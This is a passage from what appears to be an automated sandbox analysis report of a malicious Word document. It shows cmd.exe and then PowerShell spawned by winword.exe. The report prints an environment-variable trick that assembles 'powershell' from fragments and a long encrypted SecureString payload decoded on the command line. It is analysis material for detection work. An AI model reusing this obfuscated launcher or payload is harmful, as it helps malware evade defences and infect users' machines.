$('76492d1116743f0423413b16050a5345MgB8AHgAdgBHAHQANgB4AHIANwAyAFUANgBzAEsAbgB2AC8ANAA2ADQAaQByAHcAPQA9AHwANQBiADIAZABjAGYAZQBkAGMAMAA3AGMAYgA5ADAANgBkAGYAMwBjAGQANQBkADEANAA0ADgAOAA1ADkAYwBjADcAYQAzADcAYwBmAGQAZQBjADcANAAwAGIAZgAwAGYANwBlADkANgA2ADIAZgAxADcAMABiADYAYgBkADcAZQA2AGMAZQA5ADYAZgBhAGYAZgBiAGYAOQBjADEAYQBhADIAYgA5ADUAYQA1ADUAMwBmADkAYwAwAGYANwA5AGMANgA0ADEANwA2AGEAYgA0ADQAYgBmAGIANgBmADgAMAAzADYAOQA3AGIAYgBiADAANgA2AGEANQA4ADYAYQA0ADEAMABlAGUANgA4ADAAYgAyAGEAMgA5AGUAOQBkADQAOAA1ADQAYQAyADAAYQA4AGUANQA0AGYAMQAyAGQAYwBhADAANABmADMANABlAGMAZgA1AGUAMgAzADEANwBjADQAMgBkAGEAMQBmAGUAMwBiADYAYgBlADQAMgAzADMAMwAyAGIANgA4AGUAYgA1ADQAMQBlADQANwAyADUAZQBjADEAOQBlAGMANABiAGEAYwBiADAAMABjAGQAYwA1AGQAYQA4ADAANQBhADUANAAyAGUANAAzADUAOABmADcAMgAwADYAYQA2AGYAYwA4ADUAMgA5ADkAMwA5ADcAYwA5ADYAMQBiADgAYgA0ADIAMgBiADUANgAzAGQAYgA5AGUAMgA0ADAANABhADEANQA4AGMAZQBhAGUAMAA3AGEANwAzADUAZQBjADMAMwBiAGUANABlADYAMAA1ADkAMABmAGMAMQAzADcAMQAwADIAOQAxADYAMAA4ADYAMwAyADUAMAA3AGQAYgBiADQAMQBhAGIAYgBkAGYAZgA0AGMANwA0ADMAYwA4ADkAYQBkAGYAOAA5ADQAYQBhAGMAZgAyADUANwBhADEANAA1AGQAZQA0ADAAYQA3ADUANQAxADIAOQAzAGIAZgA0AGMAMwAyADQAMgA2ADQANgBiADEAOQBjAGEAYQAxADkAZAA4ADMANQAwADIAYwAzADEAZQA2AGEAOQAxADUAOAA4AGYAZgAxADMAMwBjADUANQAwADYAMwBmADkANQBmADcAOQBjADUAMABiADMANwAwAGEAMgAzADUAYQAzADMAYgA1ADQAMwBkADQAZABhADQAYwA5ADIAMgBiAGIAZQA1ADgAYgBlAGEANgAyADMANwA5ADgAZAA4ADQAMgBmADQAMQBmAGMAOAA0ADAAZgBmADYAMAA2AGIAMQA5AGYAMgBmAGUAYwAxADUAMwA5ADkAMgBjADEANQAyADEAOABlAGYAMQAxADQAYQBhADUAOABjADcANQA3AGQAZgAzADIAMABjAGEAMAA5AGUAMAAwADAAMAAzADkANgA2ADgAZgBjADAAOQA2AGIAMQAwAGYAMwBiAGUAYQAxADIAMAAxADMAZQAyADQAZAA0ADcANQAxAGUANwAyAGQAMwBlAGUAYgA2AGIAMwBiADIAMgA2ADEAYgAwADcAOAA2ADcAOQA3ADEAYwA1ADIAZgBhADYANAA4ADIAMgAwADIAZAA2AGQANQBhADEANwA4ADUANgAwADIANABhADgAMAA5AGUAMgA1AGMANwBjADgANwBjAGQAZQAwAGUANABkADcAYwA2ADUAYQBhADAAYwBhADgANQBkADgANgBjADMAYwA1ADUAYgA5ADYAZQBmADUAOABhAGEANgAwADcAOAA3ADUANQA0ADkANgAzAGYAZAA2ADAAMwAzADAAYwBkADQAOQBkAGMAZgAyAGMANQA2AGQAYgBhAGIAZQBmADkAYQBjAGMAMABiADgANgA1AGMAYQBhAGEAMQAzAGQAMAAzADUAZABjADkAZQBjADcAZAA2ADAANAAxAGYAMwA2ADQAOAA3ADAAZAAwADUANwA3ADYANABkADQAOABkADQAMwBlADIAYwBlADEANQA2ADMAZgBjADYAOQBlADIANwA1ADIAYgA4ADcAMwBiADgAMQA1ADcAYgBlADUANQA5ADgAMgBkADkANQBhADUAMQA5AGUAOQBlAGYAZgBmAGIAYQA2AGUANwA2AGUANAA0ADgAYgAzADMAZQBhADgAZQAzAGQANwAxADUAMwA4ADkAZQA5ADgANAA3ADUAYQA0ADcAOAAyAGIAMgBiADAAMQA4AGEAOQA0ADAAMQAwAGQAZQA2AGMANwA3ADkAOAA0AGIAZgAxADAANABhAGMAYwBkADcANgA4ADkAYgAxADYANgA0AGQAMgBjADIAYgA1ADkANQAzADIAZAAzADEANQA2ADQAZQBlADYAMQA1AGUAYgBhAGUANAA1ADEAYwAzAGQANwA0ADgAOAA5AGQAZQA2AGEANgBjADIAMABjADgAYQAwADUANQA5ADIAMgAxADAAMABkAGQANABmADAAOABhADAAMABmAGYANQA0ADgAYgA1AGMAZQBjAGIANABkADMAOQAyADAANgBjAGMANABiAGEAZQA3AGQANQBlAGYAOQA2AGUAMgBmADcAMwBmAGIANgBkADcAZAAwADQANwA0AGUANgAyAGQAYgA5AGMANgBlADQAOQBmADgAMwA2ADkANwA5ADAANgAxADIANwA4ADEANwA4AGEAMQBiADgAOAA3ADMANQBjAGUANQA4ADgAYwA1ADMAMgBkADgANAA1AGIAMwA5ADQAYQBmADAANQBiAGIAMwA5ADMAMQA5ADUANAA2AGUAZQA1ADgAOAAyADAANQAxADUAMgBiAGMAMwBkAGIAYwBiADkAOQA3AGUAMQA4ADgANwBmAGQAMAAwADAANAA1AGYAYwA0AGUAZAAwAGIAOQBjADQAOAAxADcANABiAGYAMABlADgAYgBmADIAZgBjAGMANQA2ADQANAAxADcANQAyADQAZgA4ADMANABlAGYAOABhADcAMAA3ADgANABlADQAYwA5AGIAYQAzADQANgA4AGUAOABlAGMAYQAxADYAOABjAGEAZgAxADcAZgA3AGMAZQBlADMANwAwAGEAYgAzADYAZgBkAGIANgA3ADcAOAAxAGEANQA5ADQAZgBjADAAMgBmADgANgAzADQANgAwAGMAYwAwAGMAZgBjADcAYwBlADYAYgBmADQAYgAzAGYANQBlAGQAMgBmAGIAMgA5ADEAOQBjAGMAYgBiADMAMwBjAGIAYwBhAGMAYQBlADkAOQA0ADcAOAA0ADUAOABhADMAYgBlADMANwBkADcAZQAwADAAMwBhADcAYgBlAGIAYQAxAGYAZQBhADEAMABhADkAOAA0ADgAMwA1AGMAMwA0ADkAZAA4ADkAZQA4ADkAYgA4ADAANAA2ADMAYgAyADAANgA2AGUAZAA0ADUAYwA5ADIANAA1ADcAMgA3ADEANwAyAGQAYQAyADEAZQA3AGMANABkADUAYgAzADAAYwA0ADkAOQBlAGYAZQBkAGYAMABlAGEAZABmADIANwBlADkAOQA1AGQAMwBmAGQAYgBjADEAMwA3ADMAMwBlAGMAOQBiADEAMwA3AGUAZgBjADUAOABlADMAYwA3ADEAOAAwADUAYwA1ADAAZQA2AGEAYgA0AGQAMgA0ADQANgBmADMAZQBhAGMANwA5AGYAMQBlAGYANwBmADIAYgAyADkAOABhADgAZABiADMAZABkADYAOQBiADUAOAAwADMANgA5AGUAOABkAGUANgBlAGUAMgBlADgAMwA4ADkAOAAyADAAMQBlAGIAZABiADUAMwBlADQAZQBhADcAYQBlAGEAMwBhADQAOABlADAAYwA2AGQAZABhADgAZgAwADYANQBjADMAMwAwAGQANQA2ADkANQBiAGQANQA4ADMAZgBhAGMAMwA2AGMAZgA4ADUAMQA2ADUAMABmAGUAMQA5AGUAMQAxADQANABhADQAZAA5ADUANABkAGIANwA3ADAAMABiADEAOQA4ADYAOQAxADMAYgAxAGYAMgA4ADYAZgBiADUAZgBjADYAOQBlADMAZQBjAGQANwBkAGIANAA3ADMAZAA0ADMAZQBlAGYAYwA1AGYAZgA5AGUANAA2ADUAOAA1ADYANwAzAGEAZQAzADUAMABhADgAMgA0ADEAMwAzAGYAYwAwADAANgA0AGIAZQAwAGQANQBkAGYAYQAxADIAZQBlAGYAOAA1ADgAZgA5ADgAMwA2ADIAOQAwAGMAMQAwADcAMAA0ADQAYgA4AGEAZgAwADkANgA2ADUANAA3AGMAMgBlADIAYgA3AGUAOQBlADgAZQBiAGIAMABhAGYANgAyAGEAMQA0AGEAYQBh |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:42, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:50 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb0c |
| Parent PID | 0x998 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B10
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x00677fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00800fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x01c0ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001c10000 | 0x01c10000 | 0x01f52fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01f60000 | 0x0222efff | Memory Mapped File | Readable |
|
|
|
- |
| cmd.exe | 0x49ee0000 | 0x49f38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76cd0000 | 0x76deefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76df0000 | 0x76ee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| winbrand.dll | 0x7fee2bf0000 | 0x7fee2bf7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefcef0000 | 0x7fefcf5afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefd210000 | 0x7fefd2aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefd420000 | 0x7fefd44dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefe460000 | 0x7fefe568fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe740000 | 0x7fefe7a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefe7d0000 | 0x7fefe7ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefed50000 | 0x7fefee18fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff210000 | 0x7feff210fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Threads
Thread 0xb10
109
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-04-05 07:21:21 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 149979 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\cmd.exe, base_address = 0x49ee0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76cd0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76ce6d40 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76cd0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76ce23d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76cd8290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76ce17e0 |
|
1 | |
| Environment | Get Environment String | name = mSjUIVjKCvrosnG |
|
1 | |
| Environment | Get Environment String | name = =YaAhiJLINtE&&set |
|
1 | |
| Environment | Get Environment String | name = iibdZAhWS |
|
1 | |
| Environment | Get Environment String | name = =p&&set |
|
1 | |
| Environment | Get Environment String | name = UKkjOWmc |
|
1 | |
| Environment | Get Environment String | name = =o^w&&set |
|
1 | |
| Environment | Get Environment String | name = CKJHjErkGaOznLZ |
|
1 | |
| Environment | Get Environment String | name = =UbmSUqbPikMOd&&set |
|
1 | |
| Environment | Get Environment String | name = orvBFUr |
|
1 | |
| Environment | Get Environment String | name = =! |
|
1 | |
| Environment | Get Environment String | name = iibdZAhWS |
|
1 | |
| Environment | Get Environment String | name = !&&set |
|
1 | |
| Environment | Get Environment String | name = GaGORjztoIjBCAG |
|
1 | |
| Environment | Get Environment String | name = =bMVIRrhb&&set |
|
1 | |
| Environment | Get Environment String | name = miGHuQvztiW |
|
1 | |
| Environment | Get Environment String | name = =e^r&&set |
|
1 | |
| Environment | Get Environment String | name = PRCHEZFPHY |
|
1 | |
| Environment | Get Environment String | name = =! |
|
1 | |
| Environment | Get Environment String | name = UKkjOWmc |
|
1 | |
| Environment | Get Environment String | name = !&&set |
|
1 | |
| Environment | Get Environment String | name = PqsKzFkV |
|
1 | |
| Environment | Get Environment String | name = =s&&set |
|
1 | |
| Environment | Get Environment String | name = bjMitdwscHzzIkV |
|
1 | |
| Environment | Get Environment String | name = =ZzjSCRRpVGC&&set |
|
1 | |
| Environment | Get Environment String | name = McrAWpDQaNJ |
|
1 | |
| Environment | Get Environment String | name = =he&&set |
|
1 | |
| Environment | Get Environment String | name = jwjXbhMi |
|
1 | |
| Environment | Get Environment String | name = =ll&&! |
|
1 | |
| Environment | Get Environment String | name = orvBFUr |
|
1 | |
| Environment | Get Environment String | name = !! |
|
1 | |
| Environment | Get Environment String | name = PRCHEZFPHY |
|
1 | |
| Environment | Get Environment String | name = !! |
|
1 | |
| Environment | Get Environment String | name = miGHuQvztiW |
|
1 | |
| Environment | Get Environment String | name = !! |
|
1 | |
| Environment | Get Environment String | name = PqsKzFkV |
|
1 | |
| Environment | Get Environment String | name = !! |
|
1 | |
| Environment | Get Environment String | name = McrAWpDQaNJ |
|
1 | |
| Environment | Get Environment String | name = !! |
|
1 | |
| Environment | Get Environment String | name = jwjXbhMi |
|
1 | |
| Environment | Get Environment String | name = ! " ( [rUnTImE.INteRoPsERvICEs.MARshAl] |
|
1 | |
| Environment | Set Environment String | name = %mSjUIVjKCvrosnG%, value = YaAhiJLINtE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = %iibdZAhWS%, value = p |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = %UKkjOWmc%, value = ow |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = %CKJHjErkGaOznLZ%, value = UbmSUqbPikMOd |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = %iibdZAhWS%, result_out = p |
|
1 | |
| Environment | Get Environment String | name = %UKkjOWmc%, result_out = ow |
|
1 | |
| Environment | Get Environment String | name = %orvBFUr%, result_out = p |
|
1 | |
| Environment | Get Environment String | name = %PRCHEZFPHY%, result_out = ow |
|
1 | |
| Environment | Get Environment String | name = %miGHuQvztiW%, result_out = er |
|
1 | |
| Environment | Get Environment String | name = %PqsKzFkV%, result_out = s |
|
1 | |
| Environment | Get Environment String | name = %McrAWpDQaNJ%, result_out = he |
|
1 | |
| Environment | Get Environment String | name = %jwjXbhMi%, result_out = ll |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xb28, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #3: powershell.exe
529
284
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell " ( [rUnTImE.INteRoPsERvICEs.MARshAl]::PTrTOsTrIngbSTR([RUNtIMe.INtEROpserVIcEs.MarshAL]::securEStRinGtObsTR( $('76492d1116743f0423413b16050a5345MgB8AHgAdgBHAHQANgB4AHIANwAyAFUANgBzAEsAbgB2AC8ANAA2ADQAaQByAHcAPQA9AHwANQBiADIAZABjAGYAZQBkAGMAMAA3AGMAYgA5ADAANgBkAGYAMwBjAGQANQBkADEANAA0ADgAOAA1ADkAYwBjADcAYQAzADcAYwBmAGQAZQBjADcANAAwAGIAZgAwAGYANwBlADkANgA2ADIAZgAxADcAMABiADYAYgBkADcAZQA2AGMAZQA5ADYAZgBhAGYAZgBiAGYAOQBjADEAYQBhADIAYgA5ADUAYQA1ADUAMwBmADkAYwAwAGYANwA5AGMANgA0ADEANwA2AGEAYgA0ADQAYgBmAGIANgBmADgAMAAzADYAOQA3AGIAYgBiADAANgA2AGEANQA4ADYAYQA0ADEAMABlAGUANgA4ADAAYgAyAGEAMgA5AGUAOQBkADQAOAA1ADQAYQAyADAAYQA4AGUANQA0AGYAMQAyAGQAYwBhADAANABmADMANABlAGMAZgA1AGUAMgAzADEANwBjADQAMgBkAGEAMQBmAGUAMwBiADYAYgBlADQAMgAzADMAMwAyAGIANgA4AGUAYgA1ADQAMQBlADQANwAyADUAZQBjADEAOQBlAGMANABiAGEAYwBiADAAMABjAGQAYwA1AGQAYQA4ADAANQBhADUANAAyAGUANAAzADUAOABmADcAMgAwADYAYQA2AGYAYwA4ADUAMgA5ADkAMwA5ADcAYwA5ADYAMQBiADgAYgA0ADIAMgBiADUANgAzAGQAYgA5AGUAMgA0ADAANABhADEANQA4AGMAZQBhAGUAMAA3AGEANwAzADUAZQBjADMAMwBiAGUANABlADYAMAA1ADkAMABmAGMAMQAzADcAMQAwADIAOQAxADYAMAA4ADYAMwAyADUAMAA3AGQAYgBiADQAMQBhAGIAYgBkAGYAZgA0AGMANwA0ADMAYwA4ADkAYQBkAGYAOAA5ADQAYQBhAGMAZgAyADUANwBhADEANAA1AGQAZQA0ADAAYQA3ADUANQAxADIAOQAzAGIAZgA0AGMAMwAyADQAMgA2ADQANgBiADEAOQBjAGEAYQAxADkAZAA4ADMANQAwADIAYwAzADEAZQA2AGEAOQAxADUAOAA4AGYAZgAxADMAMwBjADUANQAwADYAMwBmADkANQBmADcAOQBjADUAMABiADMANwAwAGEAMgAzADUAYQAzADMAYgA1ADQAMwBkADQAZABhADQAYwA5ADIAMgBiAGIAZQA1ADgAYgBlAGEANgAyADMANwA5ADgAZAA4ADQAMgBmADQAMQBmAGMAOAA0ADAAZgBmADYAMAA2AGIAMQA5AGYAMgBmAGUAYwAxADUAMwA5ADkAMgBjADEANQAyADEAOABlAGYAMQAxADQAYQBhADUAOABjADcANQA3AGQAZgAzADIAMABjAGEAMAA5AGUAMAAwADAAMAAzADkANgA2ADgAZgBjADAAOQA2AGIAMQAwAGYAMwBiAGUAYQAxADIAMAAxADMAZQAyADQAZAA0ADcANQAxAGUANwAyAGQAMwBlAGUAYgA2AGIAMwBiADIAMgA2ADEAYgAwADcAOAA2ADcAOQA3ADEAYwA1ADIAZgBhADYANAA4ADIAMgAwADIAZAA2AGQANQBhADEANwA4ADUANgAwADIANABhADgAMAA5AGUAMgA1AGMANwBjADgANwBjAGQAZQAwAGUANABkADcAYwA2ADUAYQBhADAAYwBhADgANQBkADgANgBjADMAYwA1ADUAYgA5ADYAZQBmADUAOABhAGEANgAwADcAOAA3ADUANQA0ADkANgAzAGYAZAA2ADAAMwAzADAAYwBkADQAOQBkAGMAZgAyAGMANQA2AGQAYgBhAGIAZQBmADkAYQBjAGMAMABiADgANgA1AGMAYQBhAGEAMQAzAGQAMAAzADUAZABjADkAZQBjADcAZAA2ADAANAAxAGYAMwA2ADQAOAA3ADAAZAAwADUANwA3ADYANABkADQAOABkADQAMwBlADIAYwBlADEANQA2ADMAZgBjADYAOQBlADIANwA1ADIAYgA4ADcAMwBiADgAMQA1ADcAYgBlADUANQA5ADgAMgBkADkANQBhADUAMQA5AGUAOQBlAGYAZgBmAGIAYQA2AGUANwA2AGUANAA0ADgAYgAzADMAZQBhADgAZQAzAGQANwAxADUAMwA4ADkAZQA5ADgANAA3ADUAYQA0ADcAOAAyAGIAMgBiADAAMQA4AGEAOQA0ADAAMQAwAGQAZQA2AGMANwA3ADkAOAA0AGIAZgAxADAANABhAGMAYwBkADcANgA4ADkAYgAxADYANgA0AGQAMgBjADIAYgA1ADkANQAzADIAZAAzADEANQA2ADQAZQBlADYAMQA1AGUAYgBhAGUANAA1ADEAYwAzAGQANwA0ADgAOAA5AGQAZQA2AGEANgBjADIAMABjADgAYQAwADUANQA5ADIAMgAxADAAMABkAGQANABmADAAOABhADAAMABmAGYANQA0ADgAYgA1AGMAZQBjAGIANABkADMAOQAyADAANgBjAGMANABiAGEAZQA3AGQANQBlAGYAOQA2AGUAMgBmADcAMwBmAGIANgBkADcAZAAwADQANwA0AGUANgAyAGQAYgA5AGMANgBlADQAOQBmADgAMwA2ADkANwA5ADAANgAxADIANwA4ADEANwA4AGEAMQBiADgAOAA3ADMANQBjAGUANQA4ADgAYwA1ADMAMgBkADgANAA1AGIAMwA5ADQAYQBmADAANQBiAGIAMwA5ADMAMQA5ADUANAA2AGUAZQA1ADgAOAAyADAANQAxADUAMgBiAGMAMwBkAGIAYwBiADkAOQA3AGUAMQA4ADgANwBmAGQAMAAwADAANAA1AGYAYwA0AGUAZAAwAGIAOQBjADQAOAAxADcANABiAGYAMABlADgAYgBmADIAZgBjAGMANQA2ADQANAAxADcANQAyADQAZgA4ADMANABlAGYAOABhADcAMAA3ADgANABlADQAYwA5AGIAYQAzADQANgA4AGUAOABlAGMAYQAxADYAOABjAGEAZgAxADcAZgA3AGMAZQBlADMANwAwAGEAYgAzADYAZgBkAGIANgA3ADcAOAAxAGEANQA5ADQAZgBjADAAMgBmADgANgAzADQANgAwAGMAYwAwAGMAZgBjADcAYwBlADYAYgBmADQAYgAzAGYANQBlAGQAMgBmAGIAMgA5ADEAOQBjAGMAYgBiADMAMwBjAGIAYwBhAGMAYQBlADkAOQA0ADcAOAA0ADUAOABhADMAYgBlADMANwBkADcAZQAwADAAMwBhADcAYgBlAGIAYQAxAGYAZQBhADEAMABhADkAOAA0ADgAMwA1AGMAMwA0ADkAZAA4ADkAZQA4ADkAYgA4ADAANAA2ADMAYgAyADAANgA2AGUAZAA0ADUAYwA5ADIANAA1ADcAMgA3ADEANwAyAGQAYQAyADEAZQA3AGMANABkADUAYgAzADAAYwA0ADkAOQBlAGYAZQBkAGYAMABlAGEAZABmADIANwBlADkAOQA1AGQAMwBmAGQAYgBjADEAMwA3ADMAMwBlAGMAOQBiADEAMw